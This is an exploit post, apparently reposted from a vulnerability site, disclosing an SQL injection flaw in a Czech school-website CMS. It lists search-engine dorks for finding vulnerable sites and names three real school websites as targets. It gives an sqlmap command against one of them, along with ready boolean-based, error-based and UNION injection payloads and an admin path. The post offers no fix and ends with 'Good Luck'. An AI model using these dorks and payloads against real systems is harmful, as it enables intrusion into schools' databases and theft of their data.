Information Exploit
[+] Exploit Title: Czech Copyright © 2011 - 2018 |
Vitalex Computers s.r.o. - Tvorba školních webů SQL Injection Vulnerability
[+] Author : Cxsecurity.com and KingSkrupellos from Cyberizm Digital Security Team
[+] Dork 1 : intext:'' Vitalex Computers - Tvorba školních webů'' site:cz
[+] Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz
[+] Dork 3 : inurl:''/public/printAction.php?id=''
[+] Tested on : BackBox 5.1, Chrome
[+] Other Possible Dorks :
inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz
On Target :
- https://www.skolahermanov.cz/mobil/index.php?type=Post&id=366&ref=blog&ids=437
- http://www.zszandov.cz/index.php?type=Post&id=432
- https://www.mzszasada.cz/public/printAction.php?id=164
[+] SQLMAP Poc :
$ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs
[+] Poc SQL Injection :
Parameter: id (GET) Type: boolean-based blind[+] Poc local Admin : /administrator
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=164 AND 1041=1041
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR) Payload: id=164 AND (SELECT 5925 FROM
(SELECT COUNT(*),CONCAT(0x7162627171,
(SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: id=164 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171, 0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a466372
49687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL-- zEWq
Video tutorial
Good Luck.....
Sumber : [https://cxsecurity.com/issue/WLB-2018050236]
0 Comments